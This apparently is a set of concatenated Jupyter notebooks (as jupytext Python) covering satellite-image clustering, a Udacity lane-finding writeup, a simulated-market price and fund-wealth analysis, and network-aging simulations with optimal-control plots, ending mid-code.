# %run scripts/dispms -f imagery/zhiqi/zhiqi.tif -e 2 -p [3,4,5]
# ### The emnew.py code adds Gaussian noise to the zero-valued edge pixels. They cause the algorithm to interpret the edge pixels as a compact cluster:
# %run scripts/em -K 4 -M 2 -n 0 imagery/zhiqi/5bands-fullarea.tif
# %run scripts/dispms -f imagery/zhiqi/zhiqi_em.tif -c
# %run scripts/em -h
|
src/zhiqi.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Advanced Lane Finding Project
#
# The goals / steps of this project are the following:
#
# * Compute the camera calibration matrix and distortion coefficients given a set of chessboard images.
# * Apply a distortion correction to raw images.
# * Use color transforms, gradients, etc., to create a thresholded binary image.
# * Apply a perspective transform to rectify binary image ("birds-eye view").
# * Detect lane pixels and fit to find the lane boundary.
# * Determine the curvature of the lane and vehicle position with respect to center.
# * Warp the detected lane boundaries back onto the original image.
# * Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position.
#
# [//]: # (Image References)
#
# [image1]: ./output_images/undistortedImage.jpg "Undistorted"
# [image2]: ./test_images/test1.jpg "Road Transformed"
# [image3]: ./output_images/binaryThreshold_test1.png "Binary Example"
# [image4]: ./output_images/binaryThreshold_test1_warped.jpg "Warp Example"
# [image5]: ./output_images/drawn_lines.jpg "Fit Visual"
# [image6]: ./output_images/test5.jpg "Output"
# [video1]: ./output_images/project_video.mp4 "Video"
#
# ## [Rubric](https://review.udacity.com/#!/rubrics/571/view) Points
#
# ### Here I will consider the rubric points individually and describe how I addressed each point in my implementation.
#
#
# ### Camera Calibration
#
# #### 1. Briefly state how you computed the camera matrix and distortion coefficients. Provide an example of a distortion corrected calibration image.
#
# The code for this can be found in advanced_lane_lines.ipynb. The class "PreprocessImage" provides helper functions to calibrate the camera and undistort the image. The user of the class has to first populate the objpoints using the call "populate_calibration_points". Once all the obj points are generated, "calibrate_camera" has to be called to generate the calibration matrix. Finally, the member function call "undistort_image" is used to undistort Images. The below Image is an example for preprocessed iamge.
#
# ![alt text][image1]
#
# ### Pipeline (single images)
#
# #### 1. Provide an example of a distortion-corrected image.
#
# To demonstrate this step, I will describe how I apply the distortion correction to one of the test images like this one:
# ![alt text][image2]
#
# #### 2. Describe how (and identify where in your code) you used color transforms, gradients or other methods to create a thresholded binary image. Provide an example of a binary image result.
#
# I used a combination of color and gradient thresholds to generate a binary image (function binary_threshold in `advanced_lane_lines.ipynb`). Here's an example of my output for this step.
#
# ![alt text][image3]
#
# #### 3. Describe how (and identify where in your code) you performed a perspective transform and provide an example of a transformed image.
#
# The code for perspective transformed is defined in WarpImage. Member function `create_warped` is used to create warped image and `create_unwarped` to unwarp and image. I chose the hardcode the source and destination points in the following manner:
#
# ```python
# src = np.float32([[552,462], [760,462] , [1350,668],[140,668]])
#
#
# dst = np.float32([[offset, offset], [img_size[0]-offset, offset],
# [img_size[0]-offset, img_size[1]-offset],
# [offset, img_size[1]-offset]])
# ```
#
# This resulted in the following source and destination points:
#
# | Source | Destination |
# |:-------------:|:-------------:|
# | 552, 462 | 100, 100 |
# | 760, 462 | 1180, 100 |
# | 1350, 668 | 1180, 710 |
# | 140, 668 | 100, 710 |
#
# I verified that my perspective transform was working as expected by drawing the `src` and `dst` points onto a test image and its warped counterpart to verify that the lines appear parallel in the warped image.
#
# ![alt text][image4]
#
# #### 4. Describe how (and identify where in your code) you identified lane-line pixels and fit their positions with a polynomial?
#
# I have used sliding window method to find the lane-line pixels
#
# ![alt text][image5]
#
# #### 5. Describe how (and identify where in your code) you calculated the radius of curvature of the lane and the position of the vehicle with respect to center.
#
# I calculated the curvature using the function call `calcCurvature`.
#
# #### 6. Provide an example image of your result plotted back down onto the road such that the lane area is identified clearly.
#
# The class `DemaracteLanes` wraps and abstracts all preprocessing of an image. The image below shows a sample image with lanes drawn:
#
# ![alt text][image6]
#
# ---
#
# ### Pipeline (video)
#
# #### 1. Provide a link to your final video output. Your pipeline should perform reasonably well on the entire project video (wobbly lines are ok but no catastrophic failures that would cause the car to drive off the road!).
#
# Here's a [link to my video result](./project_video.mp4)
#
# ---
#
# ### Discussion
#
# #### 1. Briefly discuss any problems / issues you faced in your implementation of this project. Where will your pipeline likely fail? What could you do to make it more robust?
#
# I have used the sliding window method to identify the lanes. Initially, I faced an issue when the lane lines overflowed the area of interest. I am listing down a few of the areas where the implementation has shortcomings.
# * Radius of curvature of 2 lanes do not match
# * If the lanes near the base of the image have broken lines, the algorithm finds it difficult to correct the starting position
# * The lanes in frames of the video are not smooth.
#
|
Untitled.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import matplotlib.pyplot as plt
from matplotlib import rc
rc('text', usetex=False)
from matplotlib import rcParams
rcParams['font.family'] = 'sans-serif'
rcParams['font.sans-serif'] = ['CMU Sans Serif']
rcParams['figure.dpi'] = 300
rcParams['savefig.dpi'] = 1200
plt.ion()
import pandas as pd
import numpy as np
# %matplotlib inline
import ternary
import math
import glob
import re
rcParams['figure.figsize'] = 14,4
def USD(x):
    """Identity pass-through mirroring the 'USD(...)' notation in the data files."""
    return x
# +
# Select which experiment's output directory to load (the second
# assignment wins; the first path is kept for convenience).
s = "../cmake-build-release/output/volatility_illustration"
s = "../cmake-build-release/output/experiment_2_statistics"
P = []
with open(s +'/prices.txt', 'r') as content_file:
    for l in content_file.readlines():
        # Each line embeds "USD(<price>)"; grab the numeric part.
        P.append(float(l.split('USD(')[1].split(')')[0]))
offset_prices = 0
prices = np.array(P)[offset_prices:-1]
# Annualized volatility of the per-step log returns (252 steps/year).
volatility = np.std(np.log( prices.flatten()[1:]
                            / prices.flatten()[:-1])
                    ) / (np.sqrt(1/252))
D = []
with open(s +'/0_dividend.txt', 'r') as content_file:
    for l in content_file.readlines():
        # Dividend lines look like "(..., <value>)"; take the second field.
        D.append(float(l.split(',')[1].split(')')[0]))
# Dividends appear to be logged twice per step; keep every other entry.
dividends = np.array(D)[offset_prices::2]
# -
# NOTE(review): `end` is set but never used below.
end = 1
# Normalized (=100 at t0) fundamental vs. market price paths.
plt.plot(100*dividends[:1*25200][offset_prices//2:] /dividends[0], label='fundamental')
plt.plot(100*prices[:1*25200] /prices[0], label='prices')
plt.xlim([0, min(len(prices), len(dividends))])
#plt.yscale('log')
plt.legend()
# Autocorrelation of log returns, discarding the first year as burn-in.
plt.acorr(np.diff(np.log(prices[252:])),maxlags=252)
plt.xlim([0,None])
plt.ylim([-0.3,0.3])
plt.xlabel("lag")
plt.ylabel("correlation coefficient")
# Same diagnostic for the dividend (fundamental) process.
plt.acorr(np.diff(np.log(dividends[252:])),maxlags=252)
plt.xlim([0,None])
plt.ylim([-0.3,0.3])
plt.xlabel("lag")
plt.ylabel("correlation coefficient")
# Annualized mean return, volatility, and a Sharpe-like ratio against
# a 2% risk-free rate, over years 10-100.
R = prices[10*252:100*252]
std = (np.exp(np.std(np.diff(np.log(R))))-1)*np.sqrt(252)
mu = (np.exp(np.mean(np.diff(np.log(R)))))**(252)-1
(mu-0.02)/std, mu, std
# Per-step total return (price change plus dividend yield).
# NOTE(review): the loop length comes from the year-9+ slice but indexing
# is into the full arrays from i=1 — looks inconsistent; confirm intent.
X = []
for i in range(1, len(prices[9*252:])):
    X.append((prices[i]/prices[i-1]) + (dividends[i]/252)/prices[i-1] - 1)
(np.mean(X)+1)**252-1
# +
# Sanity check: compound one year (252 daily steps) of a price growing
# at 2%/yr plus a dividend stream growing at the same rate.
X = 1.
P = 1
D = 0.01/252
for t in range(252):
    X *= (P*(1.02**(1/252))/P)
    X += D*(X/P)
    D = D*(1.02**(1/252))
    P = P*(1.02**(1/252))
# -
X
def readsignal(fund):
    """Load a fund's investment-signal series from '<s>/_<fund>__signal.txt'.

    Each line is expected to contain '(..., <value>)'; the numeric second
    field is parsed. Relies on the module-level directory prefix `s`.
    """
    values = []
    with open(s + f'/_{fund}__signal.txt', 'r') as handle:
        for line in handle.readlines():
            values.append(float(line.split(',')[1].split(')')[0]))
    return np.array(values)
# Plot fund 4's investment signal over time.
plt.plot(readsignal(4))
# # Plot investment signal
# Short-lag autocorrelation diagnostics for dividends and prices.
plt.acorr(np.diff(np.log(dividends)), maxlags = 20)
plt.xlim([0,None])
plt.acorr(np.diff(np.log(prices)), maxlags = 20)
plt.xlim([0,None])
def readnet_asset_value(fund):
    """Load a fund's net-asset-value series from '<s>/_<fund>__net_asset_value.txt'.

    Each line embeds 'USD(<value>)'; the numeric part is parsed into a
    float array. Relies on the module-level directory prefix `s`.

    Fix: the previous version also computed a local annualized-volatility
    estimate that was never used or returned; that dead code is removed.
    """
    values = []
    with open(s + f'/_{fund}__net_asset_value.txt', 'r') as handle:
        for line in handle.readlines():
            values.append(float(line.split('USD(')[1].split(')')[0]))
    return np.array(values)
def readpnl(fund):
    """Load a fund's profit-and-loss series from '<s>/_<fund>__pnl.txt'.

    Each line embeds 'USD(<value>)'; the numeric part is parsed into a
    float array. Relies on the module-level directory prefix `s`.
    """
    samples = []
    with open(s + f'/_{fund}__pnl.txt', 'r') as handle:
        for line in handle.readlines():
            samples.append(float(line.split('USD(')[1].split(')')[0]))
    return np.array(samples)
# +
# Wealth trajectories per strategy: endowment share of 200M plus the
# cumulative (scaled) PnL of each fund.
start=252*0
stop = start+2*25_200
concentrations = [0.378, 0.297, 0.225, 0.100]
NAV2 = concentrations[0] * 200_000_000 + 10 * readpnl(2)[start:stop].cumsum()
NAV3 = concentrations[1] * 200_000_000 + 10 * readpnl(3)[start:stop].cumsum()
NAV4 = concentrations[2] * 200_000_000 + 10 * readpnl(4)[start:stop].cumsum()
#NAV5 = concentrations[3] * 200_000_000 + 10 * readpnl(5)[start:stop].cumsum()
# Clamp stop to the shortest available series, then recompute.
# NOTE(review): stop is reset to min(stop-start, ...) while start stays 0
# here — confirm this still indexes as intended when start != 0.
stop = min(stop-start, len(NAV2), len(NAV3), len(NAV4))
NAV2 = concentrations[0] * 200_000_000 + 10 * readpnl(2)[start:stop].cumsum()
NAV3 = concentrations[1] * 200_000_000 + 10 * readpnl(3)[start:stop].cumsum()
NAV4 = concentrations[2] * 200_000_000 + 10 * readpnl(4)[start:stop].cumsum()
#NAV5 = concentrations[3] * 200_000_000 + 10 * readpnl(5)[start:stop].cumsum()
plt.plot(NAV2/NAV2[0], label="noise trader")
plt.plot(NAV3/NAV3[0], label="value investor")
plt.plot(NAV4/NAV4[0], label="trend follower")
#plt.plot(NAV5/NAV5[0], label="Kelly bettor")
plt.ylabel("wealth (multiplier)")
plt.xlabel("time")
plt.title("wealth relative to endowment")
plt.legend()
# -
|
analysis/Market Prices and Net Asset Value.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
# # Network Topology
#
# This notebook contains code for constructing, visualizing, and controlling aging in Erdos-Renyi random networks and Barabasi-Albert scale-free networks. The main network used in the paper was the Gilbert random network and the corresponding figures for it can be found in the notebooks: 'model_visualization.ipynb' and 'nonlinear_control.ipynb'. The code here corresponds to Figure S6 in the supplementary material for the paper.
from model import *
from ode_solver import *
# ## Erdos-Renyi G(N,m) random network
#
# ### Figure S4a: Vitality $\phi(t)$ as a function of time in an interdependent network compared to the linear theory
# Simulate a population of 50 Erdos-Renyi networks (N=1000, p=0.1) with
# no repair (r=0); results are written under the prefix 'ERfinal'.
# NOTE(review): parameter semantics (f = damage rate, etc.) come from
# model.py — confirm against that module.
simPopulation('ERfinal', pop_size=50, N=1000, p=0.1, d=0, f=0.025, r=0, f_thresh=0.01,
              graph_type='ERrandom_s', weight_type='uniform', check_type='none', kinetic=1, P_check=1, e=0, cost_type=['healthspan_quadratic', 8000],
              costC=0.1, costR=1, costE=0.5, costD=0.5, costL=1, P_repl=0, costrepl=1, max_repl=1, repl_type='constant',
              node_type='binary', damage_type='uniform', edge_type='binary', f_edge=0, r_edge=0, std=0.3,
              P_ablate=0,costablate=1,ablate_type='constant',repair_start=0,repair_end=100,delay=0,time_end=100,dependency=0.5,save='yes',write_inds='yes')
# +
# Overlay simulated vitality curves (grey) with their mean and the
# linear-theory prediction for the ER runs saved under 'ERfinal'.
f=0.025
r=0
alpha=10        # NOTE(review): alpha, phi0, I_list and n are unused in this cell
phi0 = 1
I_list = [0.5]
n = round(0.1*(999))
t = np.linspace(0, 100, 101)
simulated_vits = []
for fn in os.listdir('./Data/'):
    if 'ERfinal' in fn:
        if 'MEAN' in fn:
            mean_vit = np.genfromtxt('./Data/'+fn,delimiter=',')
        else:
            simulated_vits.append(np.genfromtxt('./Data/'+fn,delimiter=',')[0,:])
# Both branches plot identically; the label was moved to the mean curve.
for i, vit in enumerate(simulated_vits):
    if i == 0:
        plt.plot(np.arange(0,len(vit),1), vit, color='0.5', alpha=0.1)#, label='Simulated')
    else:
        plt.plot(np.arange(0,len(vit),1), vit, color='0.5', alpha=0.1)
plt.plot(np.arange(0,len(mean_vit[0,:]),1), mean_vit[0,:],linewidth=2.5,color='0.5',label='Simulated')
# Plot
r=0
# Closed-form linear-theory vitality, shifted by one time step.
vitality_theory = [(np.exp((-f-r)*(time-1))*(f+np.exp((f+r)*(time-1))*r))/(f+r) for time in t]
plt.plot([time-1 for time in t], vitality_theory, color='m', linestyle='--', alpha=0.5, linewidth=2.0, label='Linear Theory')
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
plt.xlabel("Time, $t$", fontsize=16)
plt.ylabel("Vitality, $\phi$", fontsize=16)
plt.ylim([-0.05,1.05])
plt.xlim([-0.05, 30])
plt.legend(loc='lower left',fontsize=14)
plt.tight_layout()
filename = 'ERfinal'
plt.savefig('Figures/'+filename+'_vitality', dpi=800)
plt.show()
# -
# ### Figure S4d: Nonlinear optimal control for different costs of repair $\alpha$
# +
from scipy.signal import savgol_filter
# Per-I-level plot styling (index order matches filelist usage below).
colors = ['#000080', '#FFA500', 'm', 'k', '#FFC0CB']
markers = ['o', '^', 's', 'D', '*']
transparencies = [0.6, 0.6, 0.4, 0.5, 1.0]
# One simulated switching-time file per interdependence level I.
filelist2=['Erdos_Renyi/0.1/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
filelist3=['Erdos_Renyi/0.15/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
filelist1=['Erdos_Renyi/0/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
filelist5=['Erdos_Renyi/0.05/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
f = 0.025
alpha=10
T = 100
# Cost-of-repair (alpha) values matching the rows of the T1/T2 curves.
parameter_list = np.arange(0,20,0.4)
def bin_data (x, y, n):
    '''
    Average consecutive groups of n points.

    x = array of x-value lists
    y = array of y-value lists
    n = number of points that each binned average will contain

    Returns (binned_x, binned_y).

    Fix: the previous version only flushed a bin when the *next* bin
    started, so the final full bin was silently dropped. All full bins
    are now emitted; a trailing partial bin (len(x) % n points) is
    still discarded, as before.
    '''
    new_x = []
    new_y = []
    full_bins = len(x) // n
    for b in range(full_bins):
        start = b * n
        new_x.append(sum(x[start:start + n]) / n)
        new_y.append(sum(y[start:start + n]) / n)
    return (new_x, new_y)
#plt.figure(figsize=(6,3))
plt.figure()
# Scatter the binned simulated switching times (T1, T2) for each
# interdependence level I; each filelist holds one CSV per level.
# NOTE(review): the loop variable n shadows the earlier n from the
# vitality cell; the bin size is passed literally as 3.
for n, filename in enumerate(filelist3):
    # open and read file data
    input_file_path = './Nonlinear/' + filename + '.csv'
    with open(input_file_path, 'rt') as tsvin:
        tsvin = csv.reader(tsvin, delimiter=',')
        row_list = list(tsvin)
        T1_list = [float(i) for i in row_list[1]]
        T2_list = [float(i) for i in row_list[2]]
    # Select the T curve to fit over
    #T_list_f = T2_list
    T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
    plt.scatter(T1_list, new_prm_list, color=colors[3], marker=markers[3], alpha=transparencies[3], s=30, edgecolors='none', label='$I=0.15$') # 0.15
    T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
    plt.scatter(T2_list, new_prm_list, color=colors[3], marker=markers[3], alpha=transparencies[3], s=30, edgecolors='none')#, label='$I=0.15$') # 0.15
for n, filename in enumerate(filelist2):
    # open and read file data
    input_file_path = './Nonlinear/' + filename + '.csv'
    with open(input_file_path, 'rt') as tsvin:
        tsvin = csv.reader(tsvin, delimiter=',')
        row_list = list(tsvin)
        T1_list = [float(i) for i in row_list[1]]
        T2_list = [float(i) for i in row_list[2]]
    # Select the T curve to fit over
    #T_list_e = T2_list
    T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
    plt.scatter(T1_list, new_prm_list, color=colors[2], marker=markers[2], alpha=transparencies[2], s=30, edgecolors='none', label='$I=0.10$') # 0.1
    T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
    plt.scatter(T2_list, new_prm_list, color=colors[2], marker=markers[2], alpha=transparencies[2], s=30, edgecolors='none')#, label='$I=0.10$') # 0.1
for n, filename in enumerate(filelist5):
    # open and read file data
    input_file_path = './Nonlinear/' + filename + '.csv'
    with open(input_file_path, 'rt') as tsvin:
        tsvin = csv.reader(tsvin, delimiter=',')
        row_list = list(tsvin)
        T1_list = [float(i) for i in row_list[1]]
        T2_list = [float(i) for i in row_list[2]]
    # Select the T curve to fit over
    #T_list_h = T2_list
    T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
    plt.scatter(T1_list, new_prm_list, color=colors[1], marker=markers[1], alpha=transparencies[1], s=30, edgecolors='none', label='$I=0.05$') # 0.05
    T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
    plt.scatter(T2_list, new_prm_list, color=colors[1], marker=markers[1], alpha=transparencies[1], s=30, edgecolors='none')#, label='$I=0.05$') # 0.05
for n, filename in enumerate(filelist1):
    # open and read file data
    input_file_path = './Nonlinear/' + filename + '.csv'
    with open(input_file_path, 'rt') as tsvin:
        tsvin = csv.reader(tsvin, delimiter=',')
        row_list = list(tsvin)
        T1_list = [float(i) for i in row_list[1]]
        T2_list = [float(i) for i in row_list[2]]
    # Select the T curve to fit over
    #T_list_d = T2_list
    T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
    plt.scatter(T1_list, new_prm_list, color=colors[0], marker=markers[0], alpha=transparencies[0], s=30, edgecolors='none', label='$I=0.00$') # 0
    T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
    plt.scatter(T2_list, new_prm_list, color=colors[0], marker=markers[0], alpha=transparencies[0], s=30, edgecolors='none')#, label='$I=0.00$') # 0
# Read in numerical results and plot
# Only I levels strictly below this threshold are accumulated/plotted.
I_thresh = 0.2
def extract(raw_string, start_marker, end_marker):
    """Return the substring of raw_string between start_marker and end_marker.

    Raises ValueError (from str.index) if either marker is absent.
    """
    begin = raw_string.index(start_marker) + len(start_marker)
    finish = raw_string.index(end_marker, begin)
    return raw_string[begin:finish]
# Accumulate the numerical (TOMLAB) T1/T2 switching-time curves across
# all run directories, then average, SG-smooth, and plot one curve pair
# per interdependence level I.
alpha_list = []
T1_dict= {}
T2_dict = {}
dirs = [x[0] for x in os.walk('./TOMLAB_data/alpha/')]
dirs = dirs[1:]
for d_idx, d in enumerate(dirs):
    files = [f for f in os.listdir(d)]
    for f_idx, f in enumerate(files):
        if 'nonlin_alpha_' in f:
            # Extract alpha value
            alpha = float(extract(d+'/'+f,'alpha_','.csv'))
            alpha_list.append(alpha)
            # Read I, T1, T2
            results_mat = np.genfromtxt(d+'/'+f,delimiter=',')
            I_vals = results_mat[0,:]
            T1_list = results_mat[1,:]
            T2_list = results_mat[2,:]
            # First directory initializes the per-I lists; later
            # directories add into them so the sum is averaged below.
            # NOTE(review): indexing by f_idx assumes every directory
            # lists its files in the same order — confirm.
            for i, I in enumerate(I_vals):
                if I < I_thresh:
                    if str(I) not in T1_dict:
                        T1_dict[str(I)] = []
                        T2_dict[str(I)] = []
                    if d_idx == 0:
                        T1_dict[str(I)].append(T1_list[i])
                        T2_dict[str(I)].append(T2_list[i])
                    else:
                        T1_dict[str(I)][f_idx] += T1_list[i]
                        T2_dict[str(I)][f_idx] += T2_list[i]
k = 0
for i, I in enumerate(I_vals[::-1]):
    # norm turns the accumulated sums into an average over directories.
    norm = 1/len(dirs)
    if I in [0., 0.05, 0.1, 0.15, 0.2]:
        if I < I_thresh:
            # Sort the curves by alpha before plotting/smoothing.
            sorted_T1_lists = [list(x) for x in zip(*sorted(zip(alpha_list, T1_dict[str(I)]), key=lambda pair: pair[0]))]
            sorted_alpha_list = sorted_T1_lists[0]
            sorted_T1_list = sorted_T1_lists[1]
            sorted_T2_lists = [list(x) for x in zip(*sorted(zip(alpha_list, T2_dict[str(I)]), key=lambda pair: pair[0]))]
            sorted_T2_list = sorted_T2_lists[1]
            norm_T1 = norm*np.array(sorted_T1_list)
            norm_T2 = norm*np.array(sorted_T2_list)
            # Smoothen with SG filter
            norm_T1 = savgol_filter(norm_T1, 11, 2)
            norm_T2 = savgol_filter(norm_T2, 11, 2)
            if colors[::-1][k] == 'k':
                plt.plot(norm_T2, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)#, linestyle='--')
                plt.plot(norm_T1, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)#, linestyle='--')
            elif colors[::-1][k] == '#000080':
                plt.plot(norm_T2, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)
                plt.plot(norm_T1, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)
            else:
                plt.plot(norm_T2, sorted_alpha_list, color=colors[::-1][k], linewidth=2.5)#, linestyle='--')
                plt.plot(norm_T1, sorted_alpha_list, color=colors[::-1][k], linewidth=2.5)#, linestyle='--')
            # shading
            if I == 0:
                plt.fill_betweenx(sorted_alpha_list, norm_T1, norm_T2, color='#000080', alpha=0.05)
            k+=1
#plt.scatter(parameter_list/2.5, T_list_g, color='magenta') # 0.25
plt.xlabel('Switching Times, $t$', fontsize=14)
plt.ylabel('Cost of repair, '+r'$\alpha$', fontsize=14)
plt.tick_params(axis='both', which='major', labelsize=12)
plt.tick_params(axis='both', which='minor', labelsize=12)
plt.xlim(0,100)
plt.ylim(1,18)
#plt.legend(loc='upper right')
plt.legend(loc='lower center', fontsize=14, borderaxespad=0.5)
plt.tight_layout()
plt.savefig('Nonlinear_ER.png', dpi=800)
plt.show()
# -
# ## Barabasi-Albert scale-free network
# ### Figure S4b: Vitality $\phi(t)$ as a function of time in an interdependent network compared to the linear theory
# Same simulation as the ER run above, but on Barabasi-Albert
# scale-free networks; results are saved under the prefix 'BA_final'.
simPopulation('BA_final', pop_size=50, N=1000, p=0.1, d=0, f=0.025, r=0, f_thresh=0.01,
              graph_type='scale_free_s', weight_type='uniform', check_type='none', kinetic=1, P_check=1, e=0, cost_type=['healthspan_quadratic', 8000],
              costC=0.1, costR=1, costE=0.5, costD=0.5, costL=1, P_repl=0, costrepl=1, max_repl=1, repl_type='constant',
              node_type='binary', damage_type='uniform', edge_type='binary', f_edge=0, r_edge=0, std=0.3,
              P_ablate=0,costablate=1,ablate_type='constant',repair_start=0,repair_end=100,delay=0,time_end=100,dependency=0.5,save='yes',write_inds='yes')
# +
# Overlay simulated vitality curves (green) with their mean and the
# linear-theory prediction for the BA runs saved under 'BA_final'.
f=0.025
r=0
alpha=10        # NOTE(review): alpha, phi0, I_list and n are unused in this cell
phi0 = 1
I_list = [0.5]
n = round(0.1*(999))
t = np.linspace(0, 100, 101)
simulated_vits = []
for fn in os.listdir('./Data/'):
    if 'BA_final' in fn:
        if 'MEAN' in fn:
            mean_vit = np.genfromtxt('./Data/'+fn,delimiter=',')
        else:
            simulated_vits.append(np.genfromtxt('./Data/'+fn,delimiter=',')[0,:])
# Both branches plot identically; the label was moved to the mean curve.
for i, vit in enumerate(simulated_vits):
    if i == 0:
        plt.plot(np.arange(0,len(vit),1), vit, color='g', alpha=0.1)#, label='Simulated')
    else:
        plt.plot(np.arange(0,len(vit),1), vit, color='g', alpha=0.1)
plt.plot(np.arange(0,len(mean_vit[0,:]),1), mean_vit[0,:],linewidth=2.5,color='g',label='Simulated')
# Plot
r=0
# Closed-form linear-theory vitality, shifted by one time step.
vitality_theory = [(np.exp((-f-r)*(time-1))*(f+np.exp((f+r)*(time-1))*r))/(f+r) for time in t]
plt.plot([time-1 for time in t], vitality_theory, color='m', linestyle='--', alpha=0.5, linewidth=2.0, label='Linear Theory')
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
plt.xlabel("Time, $t$", fontsize=16)
plt.ylabel("Vitality, $\phi$", fontsize=16)
plt.ylim([-0.05,1.05])
plt.xlim([-0.05, 30])
plt.legend(loc='lower left',fontsize=14)
plt.tight_layout()
filename = 'BA_final'
plt.savefig('Figures/'+filename+'_vitality', dpi=800)
plt.show()
# -
# ### Figure S4e: Nonlinear optimal control for different costs of repair $\alpha$
# +
from scipy.signal import savgol_filter
# Per-I-level plot styling (index order matches filelist usage below).
colors = ['#000080', '#FFA500', 'm', 'k', '#FFC0CB']
markers = ['o', '^', 's', 'D', '*']
transparencies = [0.6, 0.6, 0.4, 0.5, 1.0]
# One simulated switching-time file per interdependence level I.
filelist2=['Barabasi_Albert/0.1/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
filelist3=['Barabasi_Albert/0.15/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
filelist1=['Barabasi_Albert/0/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
filelist5=['Barabasi_Albert/0.05/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
f = 0.025
alpha=10
T = 100
# Cost-of-repair (alpha) values matching the rows of the T1/T2 curves.
parameter_list = np.arange(0,20,0.4)
def bin_data (x, y, n):
    '''
    Average consecutive groups of n points.

    x = array of x-value lists
    y = array of y-value lists
    n = number of points that each binned average will contain

    Returns (binned_x, binned_y).

    Fix: the previous version only flushed a bin when the *next* bin
    started, so the final full bin was silently dropped. All full bins
    are now emitted; a trailing partial bin (len(x) % n points) is
    still discarded, as before.
    '''
    new_x = []
    new_y = []
    full_bins = len(x) // n
    for b in range(full_bins):
        start = b * n
        new_x.append(sum(x[start:start + n]) / n)
        new_y.append(sum(y[start:start + n]) / n)
    return (new_x, new_y)
#plt.figure(figsize=(6,3))
plt.figure()
# Scatter the binned simulated switching times (T1, T2) for each
# interdependence level I; each filelist holds one CSV per level.
for n, filename in enumerate(filelist3):
    # open and read file data
    input_file_path = './Nonlinear/' + filename + '.csv'
    with open(input_file_path, 'rt') as tsvin:
        tsvin = csv.reader(tsvin, delimiter=',')
        row_list = list(tsvin)
        T1_list = [float(i) for i in row_list[1]]
        T2_list = [float(i) for i in row_list[2]]
    # Select the T curve to fit over
    #T_list_f = T2_list
    T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
    plt.scatter(T1_list, new_prm_list, color=colors[3], marker=markers[3], alpha=transparencies[3], s=30, edgecolors='none', label='$I=0.15$') # 0.15
    T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
    plt.scatter(T2_list, new_prm_list, color=colors[3], marker=markers[3], alpha=transparencies[3], s=30, edgecolors='none')#, label='$I=0.15$') # 0.15
for n, filename in enumerate(filelist2):
    # open and read file data
    input_file_path = './Nonlinear/' + filename + '.csv'
    with open(input_file_path, 'rt') as tsvin:
        tsvin = csv.reader(tsvin, delimiter=',')
        row_list = list(tsvin)
        T1_list = [float(i) for i in row_list[1]]
        T2_list = [float(i) for i in row_list[2]]
    # Select the T curve to fit over
    #T_list_e = T2_list
    T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
    plt.scatter(T1_list, new_prm_list, color=colors[2], marker=markers[2], alpha=transparencies[2], s=30, edgecolors='none', label='$I=0.10$') # 0.1
    T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
    plt.scatter(T2_list, new_prm_list, color=colors[2], marker=markers[2], alpha=transparencies[2], s=30, edgecolors='none')#, label='$I=0.10$') # 0.1
for n, filename in enumerate(filelist5):
    # open and read file data
    input_file_path = './Nonlinear/' + filename + '.csv'
    with open(input_file_path, 'rt') as tsvin:
        tsvin = csv.reader(tsvin, delimiter=',')
        row_list = list(tsvin)
        T1_list = [float(i) for i in row_list[1]]
        T2_list = [float(i) for i in row_list[2]]
    # Select the T curve to fit over
    #T_list_h = T2_list
    T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
    plt.scatter(T1_list, new_prm_list, color=colors[1], marker=markers[1], alpha=transparencies[1], s=30, edgecolors='none', label='$I=0.05$') # 0.05
    T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
    plt.scatter(T2_list, new_prm_list, color=colors[1], marker=markers[1], alpha=transparencies[1], s=30, edgecolors='none')#, label='$I=0.05$') # 0.05
for n, filename in enumerate(filelist1):
    # open and read file data
    input_file_path = './Nonlinear/' + filename + '.csv'
    with open(input_file_path, 'rt') as tsvin:
        tsvin = csv.reader(tsvin, delimiter=',')
        row_list = list(tsvin)
        T1_list = [float(i) for i in row_list[1]]
        T2_list = [float(i) for i in row_list[2]]
    # Select the T curve to fit over
    #T_list_d = T2_list
    T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
